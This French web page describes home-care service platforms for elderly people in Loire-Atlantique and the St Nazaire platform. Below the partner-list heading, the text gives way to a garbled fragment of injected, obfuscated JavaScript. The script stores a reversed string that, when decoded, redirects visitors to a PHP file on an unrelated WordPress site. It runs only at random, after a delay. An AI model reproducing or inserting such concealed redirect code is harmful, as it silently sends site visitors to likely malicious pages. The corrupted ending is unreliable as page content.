Nos partenaires

Préambule

Si les tendances démographiques récentes se maintiennent, une personne en France sur trois aura plus de 60 ans en 2060. (Source : Insee, projections de population 2007-2060). La Loire-Atlantique est le département le plus peuplé des Pays de la Loire avec 1 282 000 habitants au 1er janvier 2010. C’est aussi celui dont le nombre d’habitants augmente le plus vite chaque année : 13 450 par an.L’arrivée en âge avancé des générations nées après la première guerre mondiale va renforcer les effectifs des personnes âgées de 80 ans ou plus, particulièrement sujettes à la dépendance. À cela vont s’ajouter les générations nombreuses issues du baby-boom qui franchissent le seuil des 60 ans.

Le risque de perte d’autonomie, qu’il soit physique ou mental, augmente avec l’âge. Certaines personnes âgées de 60 ans ou plus requièrent des besoins croissants d’aide pour accomplir les gestes de la vie quotidienne.

La prévention de la perte d’autonomie doit donc être une préoccupation tout au long de la vie et être renforcée au grand âge.

Au regard du choix des usagers qui font de la vie au domicile une priorité, il faut aussi penser à la santé des aidants familiaux. Cela passe par la connaissance des services et dispositifs existants permettant d’améliorer la qualité de vie à domicile et de prévenir l’épuisement de ces aidants : Des solutions alternatives au maintien à domicile existent pour permettre de vivre le plus longtemps possible à domicile.

Les plateformes de services

Les plateformes de services participent à l’optimisation du parcours de santé de la personne âgée en risque de perte d’autonomie et peuvent être une solution alternative ou un soutien pour les aidants.

Elles fédèrent en proximité des services tels que des accueils de jour, des hébergements temporaires, des services de soins infirmiers à domicile ou services polyvalents d’aide et de soins à domicile.

En communiquant entre eux, les services organisent la prise en charge de la personne et concourent à un déroulement fluide de son parcours de santé. Elles évitent ainsi les hospitalisations inutiles ou favorisent un retour précoce à domicile et proposent un accompagnement personnalisé tant pour l’aidant que pour l’usager.

Les plateformes de services ont vocation d’apporter une réponse articulée entre les services qui les composent pour permettre de continuer à vivre à domicile :

Les SSIAD (service de soins infirmiers à domicile) permettent aux personnes âgées et handicapées qui le désirent de rester vivre à leur domicile tout en y recevant les soins appropriés à leur état de santé.

Les SPASAD sont des services qui assurent les missions d’un SSIAD et les missions d’un SAAD (service d’aide et d’accompagnement à domicile). Ils sont dénommés Services Polyvalents d’Aide et de Soins à Domicile.

L’Accueil de Jour permet d’accueillir à la journée voire à la demi-journée dans des locaux dédiés, des personnes âgées vivant à leur domicile. Il a comme objectifs principaux de préserver, maintenir voire restaurer l’autonomie des personnes atteintes de troubles cognitifs et physiques, et de leur permettre une poursuite de la vie à domicile dans les meilleures conditions possibles, tant pour elles que pour leurs aidants.

L’Hébergement Temporaire permet d’accueillir sur une période limitée des personnes âgées de + de 60 ans dont la vie à domicile est momentanément compromise. L’hébergement temporaire accompagne l’usager et l’aidant dans l’objectif d’un retour à domicile réussi.

 

 

La plateforme de services de St Nazaire :

  • s’adresse aux professionnels de santé du domicile, du territoire de St Nazaire et de sa région (territoire de la carène)
  • répond à des besoins médico-sociaux et permet d’éviter les hospitalisations inutiles
  • est composée du SSIAD « ANSDPAH » et de plusieurs EHPAD disposant de places d’accueil de jour et d’hébergement temporaire

Liste des partenaires

) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andre-des-eaux-44.html”]